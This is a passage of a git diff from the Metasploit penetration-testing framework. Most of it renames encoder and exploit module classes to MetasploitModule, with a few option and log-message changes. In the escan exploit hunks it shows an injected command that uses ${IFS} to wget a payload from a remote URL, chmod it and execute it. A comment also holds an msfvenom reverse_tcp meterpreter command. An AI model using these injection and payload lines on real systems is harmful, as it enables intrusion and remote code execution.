MetasploitModule < Msf::Auxiliary # # This module acts as an compromised webserver distributing PII Data diff --git a/modules/encoders/cmd/echo.rb b/modules/encoders/cmd/echo.rb index 95911f0ded..9428e684a1 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GoodRanking diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 16e62302ef..cf565b8388 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good Rank = ManualRanking diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 602b3508d2..431d0a54f7 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Below normal ranking because this will produce incorrect code a lot of # the time. diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index 0236e0191e..40c8ab0871 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = NormalRanking diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index e30a7a359a..ccadc43acf 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ExcellentRanking def initialize diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index c713d4379a..d0bf51c6d7 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index 7db8116178..280389b784 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Set to ManualRanking because actually using ths encoder will # certainly destroy any possibility of a successful shell. diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 6703a746d8..601c77b0ea 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder def initialize super( diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index dbe78d536b..f65650fdfc 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index a0fe137c57..e1f5d061d1 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index 7492549ead..d620e9d82a 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 2e1eff8ab9..10c5a368ea 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 05327a5233..ae99c2170b 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GreatRanking def initialize diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index 1621e2a3e8..b497b5ee11 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index b0e6a90bd2..797d9cf259 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 34995ec80e..02759315a5 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback def initialize super( diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 73586cccc7..fc4bcee4a1 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/add_sub.rb b/modules/encoders/x86/add_sub.rb index 93c6c7a014..0175313484 100644 --- a/modules/encoders/x86/add_sub.rb +++ b/modules/encoders/x86/add_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 2376e6dd61..e89f4c30fa 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking def initialize diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0430d6f403..61703a9acb 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 44180f5a9e..af1818e684 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 238e87b60e..a90ee8a66b 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -88,7 +88,7 @@ require 'msf/core' # 0000004A 3401 xor al,0x1 # 0000004C 7F db 0x7F # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index 52814983cd..b3ddd8612d 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor' # >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - # -class Metasploit3 < Rex::Encoder::BloXor +class MetasploitModule < Rex::Encoder::BloXor # Note: Currently set to manual, bump it up to automatically get selected by the framework. # Note: BloXor by design is slow due to its exhaustive search for a solution. diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index 6c834132f4..d758825bca 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb @@ -177,7 +177,7 @@ class SizeCalculator end -class Metasploit4 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index c49f4572a9..3a2bf89737 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index b354574539..9181b1786f 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the cpuid value is generated and supplied # manually... diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 4de58d3824..c7ac475cd6 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the stat(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index f5db335623..06ec12c266 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the time(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 78faa90631..d90556073a 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index f942c29eb9..685635f96a 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5a0b98d082..a0f9f7c2c0 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Uncomment when we get the poly stuff working again. #Rank = GreatRanking diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index b4e275351e..656adc6731 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonalpha' -class Metasploit3 < Msf::Encoder::NonAlpha +class MetasploitModule < Msf::Encoder::NonAlpha Rank = LowRanking diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 48a261b1f7..317b07b8bc 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonupper' -class Metasploit3 < Msf::Encoder::NonUpper +class MetasploitModule < Msf::Encoder::NonUpper Rank = LowRanking diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index a28dbc3702..e214b9f108 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Encoder register_options( [ OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]), - OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ]) + OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false]) ], self.class) end @@ -179,10 +179,8 @@ class Metasploit3 < Msf::Encoder raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set." end - protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true" - # with everything set up, we can now call the encoding routine - state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload) + state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect']) state.buf = "" state.decoder_stub diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 14487f60bc..76ff8908c9 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -8,7 +8,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # The shikata encoder has an excellent ranking because it is polymorphic. # Party time, excellent! diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index e4bb69f6d1..3cc1976a5c 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -12,7 +12,7 @@ require 'msf/core' # The decoder has been tested with all possible values, but the decoder stub # is was not designed to bypass restrictions other than "bit 5 must be on".. # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, specifically diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 255f7f21d4..d33c46b153 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 821d6f5c92..d04c1b4bf6 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index 18f91d7ec9..f1b171b225 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index ad11665a90..cae0405028 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 3e8a17e173..758de4da37 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index d1d13e601c..bc9e5eeefa 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/adb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb index 5b3c906329..6eb7887d6f 100644 --- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb +++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'digest/md5' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 5da4b1aabc..8154bd8d76 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 1ac2e4a2b6..3440245813 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/fileformat' require 'msf/core/exploit/pdf' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 204bf8af5b..68d170b452 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 1217a5735b..79316f8a10 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 99882d452c..25d7a2c2e1 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 2b6fdc0353..8b0143ea98 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 6fe5362b96..a7c3cca617 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index c4d398710d..7cef87bd46 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup diff --git a/modules/exploits/firefox/local/exec_shellcode.rb b/modules/exploits/firefox/local/exec_shellcode.rb index 043290fb83..ebd888f488 100644 --- a/modules/exploits/firefox/local/exec_shellcode.rb +++ b/modules/exploits/firefox/local/exec_shellcode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index d7382725c1..9e103542ab 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 6a352d7bab..53e1d628aa 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index e16a64a85c..8756789024 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index aa6f165b1b..bca3e3b626 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # It needs 3 minutes wait time # WfsDelay set to 180, so it should be a Manual exploit, # to avoid it being included in automations diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 4bd783ad7b..77e8021592 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - print_status("#{peer} - Sending soap request...") + print_status("Sending soap request...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index 56bb341327..b954027c17 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index c2b302d0a0..d58dd31fc0 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 033eee1c4e..3b5e5ebea2 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 0a2b902014..c4bbe2df1b 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index b80a21d738..e07c08159b 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index d6236e994b..89a500c3ea 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def cmd_exec(session, cmd) case session.type when /meterpreter/ - print_warning("#{peer} - Use a shell payload in order to get root!") + print_warning("Use a shell payload in order to get root!") when /shell/ o = session.shell_command_token(cmd) o.chomp! if o @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote @dropped_elf = rand_text_alpha(rand(5) + 3) command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(command) if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" command << File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + 